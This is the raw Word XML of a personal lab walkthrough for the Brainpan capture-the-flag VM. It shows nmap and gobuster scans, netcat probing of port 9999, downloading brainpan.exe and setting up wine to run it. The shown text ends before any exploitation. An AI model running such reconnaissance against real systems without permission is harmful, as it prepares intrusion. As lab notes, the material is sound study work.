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A959B" w14:textId="58FA831D" w:rsidR="00A64941" w:rsidRPr="00A64941" w:rsidRDefault="00A64941">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64941">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Brainpan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6769160B" w14:textId="3FFB1C9E" w:rsidR="00A64941" w:rsidRDefault="00A64941">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A22BD0" w14:textId="79DAFE38" w:rsidR="00A64941" w:rsidRDefault="005A1501">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Open terminal and mkdir brainpan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157AA2B" w14:textId="6CB6C741" w:rsidR="005A1501" w:rsidRDefault="005A1501">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>CD brianpan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F813502" w14:textId="7A07D9C9" w:rsidR="00A64941" w:rsidRDefault="00A64941">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64941">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Run Brainpan VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> then minimize. Ignore that is running ubuntu. You would not know that in real life.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9EEE5A" w14:textId="41DA45A3" w:rsidR="00A87BA0" w:rsidRDefault="00A87BA0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D5663D" w14:textId="62C109F8" w:rsidR="00A87BA0" w:rsidRPr="00A87BA0" w:rsidRDefault="00A87BA0">
      <w:r>
        <w:t>Ifconfig to found out kali IP and CIDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A432A" w14:textId="5C58897A" w:rsidR="00A64941" w:rsidRDefault="00A64941">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nmap $IP/24 to locate brainpan IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B4EE53" w14:textId="54EF6AEE" w:rsidR="00A87BA0" w:rsidRDefault="00A87BA0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE60D44" wp14:editId="167D15C5">
            <wp:extent cx="5943600" cy="4168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392F" w14:textId="3B41A3CB" w:rsidR="00A64941" w:rsidRDefault="00A64941">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Run nmap -sV -sT -A -p- $IP</w:t>
      </w:r>
      <w:r w:rsidR="00A22663">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00074FEE" w:rsidRPr="004D5C1C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cdn.comparitech.com/wp-content/uploads/2019/06/Nmap-Cheat-Sheet.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A22663">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22546FAF" w14:textId="392E035D" w:rsidR="00074FEE" w:rsidRDefault="00074FEE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3543E160" wp14:editId="12677B04">
            <wp:extent cx="5943600" cy="4226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19EE" w14:textId="6A0812AC" w:rsidR="00A22663" w:rsidRDefault="00A22663">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Most notable results are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C147EB" w14:textId="7C5226FD" w:rsidR="00A22663" w:rsidRDefault="00A22663">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>9999/tcp, open, abyss?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AEAC6C" w14:textId="692947C1" w:rsidR="00A22663" w:rsidRDefault="00A22663">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>10000/tcp, open, http, SimpleHTTPServer 0.6 (Python 2.7.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EA1595" w14:textId="15070DE1" w:rsidR="00A22663" w:rsidRPr="00074FEE" w:rsidRDefault="00A22663">
      <w:r w:rsidRPr="00074FEE">
        <w:t xml:space="preserve">Scanned with gobuster </w:t>
      </w:r>
      <w:r w:rsidR="00E30BC1" w:rsidRPr="00074FEE">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E30BC1" w:rsidRPr="00074FEE">
        <w:t>https://installlion.com/kali/kali/main/g/gobuster/install/index.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00074FEE">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3C685" w14:textId="06729FE8" w:rsidR="00074FEE" w:rsidRDefault="00074FEE" w:rsidP="00A22663">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074FEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>gobuster dir -u http://</w:t>
      </w:r>
      <w:r w:rsidR="00163F5C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>$IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00074FEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>/ -w /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1304D466" w14:textId="1F0FCD08" w:rsidR="00074FEE" w:rsidRDefault="00074FEE" w:rsidP="00A22663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3C396BE5" wp14:editId="00B83156">
            <wp:extent cx="5943600" cy="2681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FD81" w14:textId="13760FE9" w:rsidR="00074FEE" w:rsidRDefault="00074FEE" w:rsidP="00A22663">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074FEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>gobuster dir -u http://</w:t>
      </w:r>
      <w:r w:rsidR="00163F5C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>$IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00074FEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>:9999/ -w /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D14F0B" w14:textId="6CB28B82" w:rsidR="00074FEE" w:rsidRDefault="00074FEE" w:rsidP="00A22663">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42C8FB9F" wp14:editId="78D608C8">
            <wp:extent cx="5943600" cy="2689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4C02" w14:textId="51C18698" w:rsidR="00074FEE" w:rsidRDefault="00074FEE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074FEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>gobuster dir -u http://</w:t>
      </w:r>
      <w:r w:rsidR="00163F5C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>$IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00074FEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>:10000/ -w /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C55C47" w14:textId="2830C427" w:rsidR="00074FEE" w:rsidRDefault="00163F5C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1E1D346" wp14:editId="757C7206">
            <wp:extent cx="5943600" cy="2963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C46D" w14:textId="384BA352" w:rsidR="00A22663" w:rsidRPr="00163F5C" w:rsidRDefault="00A22663">
      <w:r w:rsidRPr="00163F5C">
        <w:t xml:space="preserve">End up with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536918F4" w14:textId="4DC3645F" w:rsidR="00A22663" w:rsidRPr="00163F5C" w:rsidRDefault="00A22663">
      <w:r w:rsidRPr="00163F5C">
        <w:t>/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEE62C8" w14:textId="0BC996AB" w:rsidR="00471121" w:rsidRDefault="00471121">
      <w:r w:rsidRPr="00163F5C">
        <w:t>/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA5D066" w14:textId="07A29446" w:rsidR="00697851" w:rsidRPr="00163F5C" w:rsidRDefault="00697851">
      <w:r>
        <w:t>Decide to check various combinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB5C1E" w14:textId="3EA85511" w:rsidR="00471121" w:rsidRDefault="00471121">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76247C" w14:textId="77777777" w:rsidR="00EB2C36" w:rsidRDefault="00EB2C36" w:rsidP="00EB2C36">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E625927" w14:textId="12F78302" w:rsidR="00EB2C36" w:rsidRDefault="00EB2C36" w:rsidP="00EB2C36">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B55E67E" w14:textId="61BA8732" w:rsidR="00EB2C36" w:rsidRDefault="00EB2C36" w:rsidP="00EB2C36">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP</w:t>
      </w:r>
      <w:r w:rsidR="00CD2439">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231292D8" w14:textId="51EB63CE" w:rsidR="004C3F03" w:rsidRDefault="004C3F03" w:rsidP="004C3F03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>:9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9831D3" w14:textId="6C96E4A8" w:rsidR="004C3F03" w:rsidRDefault="004C3F03" w:rsidP="004C3F03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP:9999/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBC3ED2" w14:textId="73CEFCE3" w:rsidR="004C3F03" w:rsidRDefault="004C3F03" w:rsidP="004C3F03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP:9999/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC2EFF4" w14:textId="66C8740B" w:rsidR="004C3F03" w:rsidRDefault="004C3F03" w:rsidP="004C3F03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP:9999/bin/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE17356" w14:textId="77777777" w:rsidR="004C3F03" w:rsidRDefault="004C3F03" w:rsidP="00EB2C36">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F96786D" w14:textId="0BFAB1BD" w:rsidR="00163F5C" w:rsidRDefault="00163F5C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9656657" wp14:editId="684DC86E">
            <wp:extent cx="5943600" cy="2237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D3E1" w14:textId="6C14666F" w:rsidR="00603909" w:rsidRDefault="00603909" w:rsidP="00603909">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F23EA" w14:textId="1F17F625" w:rsidR="00603909" w:rsidRDefault="00603909" w:rsidP="00603909">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>10000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF2A54D" w14:textId="364CFFDB" w:rsidR="00603909" w:rsidRDefault="00603909" w:rsidP="00603909">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="430046FB" wp14:editId="72B1D02E">
            <wp:extent cx="5943600" cy="4904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7EF1" w14:textId="0D1D7486" w:rsidR="00603909" w:rsidRDefault="00603909" w:rsidP="00603909">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>10000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D26FF5" w14:textId="4C0E5869" w:rsidR="00603909" w:rsidRDefault="00603909" w:rsidP="00603909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5D6298B2" wp14:editId="2A88DBBA">
            <wp:extent cx="4057650" cy="1476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42C" w14:textId="51F57688" w:rsidR="00603909" w:rsidRDefault="00603909" w:rsidP="00603909">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Firefox $IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>10000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>/bin/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565BAE84" w14:textId="275F7925" w:rsidR="00603909" w:rsidRDefault="00603909" w:rsidP="00603909">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B740BC" wp14:editId="553B19ED">
            <wp:extent cx="4981575" cy="1609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1462" w14:textId="020F6185" w:rsidR="00471121" w:rsidRDefault="00471121">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA7D41">
        <w:t>/bin has a file called brainpan.exe (downloaded file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231CE264" w14:textId="52E832AC" w:rsidR="00471121" w:rsidRPr="00EA7D41" w:rsidRDefault="00471121">
      <w:r w:rsidRPr="00EA7D41">
        <w:t>Decided to nc the $IP</w:t>
      </w:r>
      <w:r w:rsidR="00EA7D41">
        <w:t xml:space="preserve"> with various combinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F61F42" w14:textId="77777777" w:rsidR="00EA7D41" w:rsidRDefault="00471121" w:rsidP="00471121">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Nc $IP:9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0FC530" w14:textId="4077DA15" w:rsidR="00471121" w:rsidRDefault="00EA7D41" w:rsidP="00471121">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="775BC878" wp14:editId="1726A440">
            <wp:extent cx="536257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ABEF" w14:textId="1B38A766" w:rsidR="00471121" w:rsidRDefault="00471121" w:rsidP="00471121">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Nc $IP:10000</w:t>
      </w:r>
      <w:r w:rsidR="00EA7D41">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA7D41" w:rsidRPr="00EA7D41">
        <w:t>– No response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44495A08" w14:textId="373AA0D9" w:rsidR="00471121" w:rsidRDefault="00471121">
      <w:r w:rsidRPr="00EA7D41">
        <w:t xml:space="preserve">Entering anything just results in access denied. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3987F6" w14:textId="73FE1AD9" w:rsidR="00744E71" w:rsidRDefault="00744E71">
      <w:r>
        <w:t>Since there is an EXE, I downloaded it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7658FD54" w14:textId="0A70B0C9" w:rsidR="00744E71" w:rsidRDefault="00744E71">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744E71">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget -q </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="004D5C1C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.107:10000/bin/brainpan.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31447AA5" w14:textId="6E9DA061" w:rsidR="00744E71" w:rsidRPr="00744E71" w:rsidRDefault="00744E71">
      <w:r w:rsidRPr="00744E71">
        <w:t>I then ran a file check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E9E0E" w14:textId="451A9EDE" w:rsidR="00744E71" w:rsidRPr="00744E71" w:rsidRDefault="00744E71">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>File brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED485D" w14:textId="09288E2B" w:rsidR="00744E71" w:rsidRDefault="00744E71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA1B831" wp14:editId="2C15AB46">
            <wp:extent cx="5943600" cy="643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B4E0" w14:textId="6E7F04B2" w:rsidR="00684364" w:rsidRDefault="00684364">
      <w:r>
        <w:t>I also checked the strings of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E421C5" w14:textId="264FBCF2" w:rsidR="00684364" w:rsidRDefault="00684364">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D1418EC" wp14:editId="5720F479">
            <wp:extent cx="5943600" cy="4048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90E3" w14:textId="15D85C71" w:rsidR="00471121" w:rsidRPr="007F702D" w:rsidRDefault="00684364">
      <w:r>
        <w:t xml:space="preserve">There was an odd string, unfortunately didn’t work, and the brainpan login again. This is the file running when nc is done. </w:t>
      </w:r>
      <w:r w:rsidR="00C44756" w:rsidRPr="007F702D">
        <w:t>Since it is</w:t>
      </w:r>
      <w:r w:rsidR="00744E71">
        <w:t xml:space="preserve"> a windows</w:t>
      </w:r>
      <w:r w:rsidR="00C44756" w:rsidRPr="007F702D">
        <w:t xml:space="preserve"> exe, I decided to run it in wine</w:t>
      </w:r>
      <w:r w:rsidR="00883820" w:rsidRPr="007F702D">
        <w:t xml:space="preserve"> but I didn’t have wine installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF0D22" w14:textId="0F6A7CDB" w:rsidR="00883820" w:rsidRDefault="00883820">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Switch kali to NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21675CAE" w14:textId="77777777" w:rsidR="00073423" w:rsidRDefault="00073423">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073423">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg --add-architecture i386 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC52801" w14:textId="67BFAF94" w:rsidR="00A04919" w:rsidRDefault="00073423">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00A04919">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40354EF3" w14:textId="3A57DBE5" w:rsidR="00A04919" w:rsidRDefault="00073423">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00A04919">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pt-get install wine32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E15ADB2" w14:textId="779E1606" w:rsidR="00A04919" w:rsidRDefault="00A04919" w:rsidP="00A04919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Followed prompts</w:t>
      </w:r>
      <w:r w:rsidR="009C24B8">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>, q on man</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFD673" w14:textId="7E6C0DDC" w:rsidR="00995A85" w:rsidRDefault="00995A85" w:rsidP="00A04919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May need to apt-get install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CBED7" w14:textId="3CDF8340" w:rsidR="00995A85" w:rsidRDefault="00995A85" w:rsidP="00995A85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>Udev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D60E4D" w14:textId="3DCDF141" w:rsidR="00995A85" w:rsidRDefault="00995A85" w:rsidP="00995A85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>Gnome-bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD311E" w14:textId="28BE9F74" w:rsidR="00995A85" w:rsidRDefault="00995A85" w:rsidP="00995A85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>Libsane:amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F7DC10" w14:textId="0C7E4061" w:rsidR="00995A85" w:rsidRDefault="00995A85" w:rsidP="00995A85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>Libsane:i386</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62788182" w14:textId="0A82DE63" w:rsidR="00995A85" w:rsidRDefault="00995A85" w:rsidP="00995A85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>Sane-utils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A2B8B" w14:textId="52B0D383" w:rsidR="00B8715F" w:rsidRDefault="00B8715F" w:rsidP="00B8715F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">May need to apt </w:t>
      </w:r>
      <w:r w:rsidR="00BE42AB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">remove </w:t>
      </w:r>
      <w:r w:rsidR="005868F7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>to clean up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549DB60E" w14:textId="0EA1928F" w:rsidR="007F702D" w:rsidRPr="007F702D" w:rsidRDefault="007F702D" w:rsidP="007F702D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Switch kali back to Host-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572972C4" w14:textId="16132702" w:rsidR="009C24B8" w:rsidRDefault="009C24B8" w:rsidP="009C24B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>WINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC414E" w14:textId="2A1D3D5C" w:rsidR="005744B6" w:rsidRPr="005744B6" w:rsidRDefault="005744B6" w:rsidP="009C24B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005744B6">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Brainpan.exe app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4157CE" w14:textId="782DFD6C" w:rsidR="009C24B8" w:rsidRDefault="009C24B8" w:rsidP="009C24B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>Wine brainpan.exe</w:t>
      </w:r>
